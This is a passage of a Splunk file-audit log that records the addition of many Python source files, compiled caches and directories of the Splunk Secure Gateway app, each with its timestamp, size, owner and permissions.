uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.297, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/__pycache__/async_client_factory.cpython-37.pyc", isdir=0, size=3561, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.292, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/__pycache__/async_client.cpython-37.pyc", isdir=0, size=4219, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.288, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/__pycache__/__init__.cpython-37.pyc", isdir=0, size=241, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.284, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/async_splunk_client.py", isdir=0, size=21220, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.280, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/async_spacebridge_client.py", isdir=0, size=2875, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.274, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/async_server_info_client.py", isdir=0, size=3024, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.270, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/async_non_ssl_client.py", isdir=0, size=505, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.264, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/async_kvstore_client.py", isdir=0, size=7796, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.260, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/async_client_factory.py", isdir=0, size=3598, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.256, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/async_client.py", isdir=0, size=4714, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.251, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:16.246, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.141, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration/__pycache__/registration_webhook.cpython-37.pyc", isdir=0, size=2354, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.136, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration/__pycache__/__init__.cpython-37.pyc", isdir=0, size=246, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:16.132, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration/validate_auth_code.py", isdir=0, size=6648, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.127, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration/saml_registration_handler.py", isdir=0, size=8579, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.123, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration/registration_webhook.py", isdir=0, size=2396, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.118, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration/complete_pairing.py", isdir=0, size=11363, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.113, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration/companion_app_registration.py", isdir=0, size=6573, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:16.109, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:16.103, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.998, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/devices/__pycache__/users_devices.cpython-37.pyc", isdir=0, size=2842, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.994, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/devices/__pycache__/user_devices.cpython-37.pyc", isdir=0, size=3341, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.988, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/devices/__pycache__/__init__.cpython-37.pyc", isdir=0, size=241, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.983, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/devices/users_devices.py", isdir=0, size=2282, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.978, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/devices/user_devices.py", isdir=0, size=3622, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.973, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/devices/delete_device.py", isdir=0, size=4835, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.970, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/devices/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:12 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:15.964, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/devices/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.860, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/__pycache__/load_balancer_verification.cpython-37.pyc", isdir=0, size=2291, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.855, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/__pycache__/base_endpoint.cpython-37.pyc", isdir=0, size=5526, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.851, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/__pycache__/__init__.cpython-37.pyc", isdir=0, size=233, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.846, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/subscription/subscription_handler.py", isdir=0, size=11913, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.842, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/subscription/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.838, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/dashboard/dashboards_handler.py", isdir=0, size=3034, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.833, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/dashboard/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.829, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/__pycache__/deployment_info.cpython-37.pyc", isdir=0, size=7141, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.825, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/__pycache__/__init__.cpython-37.pyc", isdir=0, size=240, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.719, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/deployment_name.py", isdir=0, size=3875, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.713, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/deployment_info.py", isdir=0, size=8019, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.709, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/deployment_bundle.py", isdir=0, size=6904, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.705, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/app_list.py", isdir=0, size=4600, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.701, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/app.py", isdir=0, size=8108, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.696, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/all_apps.py", isdir=0, size=1839, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.692, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:15.688, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.684, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/services/__pycache__/splunk_service.cpython-37.pyc", isdir=0, size=13643, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.679, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/services/__pycache__/kvstore_service.cpython-37.pyc", isdir=0, size=8858, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.675, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/services/__pycache__/__init__.cpython-37.pyc", isdir=0, size=242, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.570, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/services/splunk_service.py", isdir=0, size=14676, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.566, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/services/spacebridge_service.py", isdir=0, size=13299, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.562, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/services/kvstore_service.py", isdir=0, size=9169, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.556, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/services/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:15.551, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/services/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.544, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/feature_types_kvstore_handlers/feature.py", isdir=0, size=8068, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.540, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/feature_types_kvstore_handlers/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.536, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/util", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.532, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/subscription", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.528, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/ssg_migration_handler.py", isdir=0, size=3934, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.524, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/sign_credentials_endpoint.py", isdir=0, size=1732, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.521, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/services", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.516, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/secrets.py", isdir=0, size=2143, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.513, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/registration", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.509, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/qr_handlers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.506, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/opt_in", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.501, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/mdm_saml_handler.py", isdir=0, size=9000, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.497, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/load_balancer_verification.py", isdir=0, size=2387, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.490, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/license_handler.py", isdir=0, size=1887, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.485, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/feature_types_kvstore_handlers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.482, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/devices", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/debug", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.473, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/dashboard", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.469, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/config", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.464, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/clients", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.460, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/base_endpoint.py", isdir=0, size=7087, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.455, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/async_base_endpoint.py", isdir=0, size=3730, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.451, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:15.447, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/rest/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.241, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/versioning/__pycache__/package_version.cpython-37.pyc", isdir=0, size=2146, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.238, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/versioning/__pycache__/client_minimum.cpython-37.pyc", isdir=0, size=1978, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.235, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/versioning/__pycache__/__init__.cpython-37.pyc", isdir=0, size=350, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.131, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/versioning/package_version.py", isdir=0, size=2055, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.127, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/versioning/client_minimum.py", isdir=0, size=2214, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.124, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/versioning/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:15.120, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/versioning/__init__.py", isdir=0, size=148, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.116, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search/__pycache__/search_job_params.cpython-37.pyc", isdir=0, size=2470, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.112, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search/__pycache__/saved_search_requests.cpython-37.pyc", isdir=0, size=3871, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.108, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search/__pycache__/input_token_support.cpython-37.pyc", isdir=0, size=4774, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.104, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search/__pycache__/__init__.cpython-37.pyc", isdir=0, size=235, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:15.098, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search/search_job_params.py", isdir=0, size=4386, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.092, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search/saved_search_requests.py", isdir=0, size=5923, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.088, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search/input_token_support.py", isdir=0, size=7138, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:15.084, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:15.080, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/search/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:14.974, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/word_list.cpython-37.pyc", isdir=0, size=737, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.963, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/type_to_string.cpython-37.pyc", isdir=0, size=752, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.958, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/time_utils.cpython-37.pyc", isdir=0, size=2079, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.954, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/test_state.cpython-37.pyc", isdir=0, size=478, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.949, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/string_utils.cpython-37.pyc", isdir=0, size=628, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:14.945, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/util/__pycache__/shard.cpython-37.pyc", isdir=0, 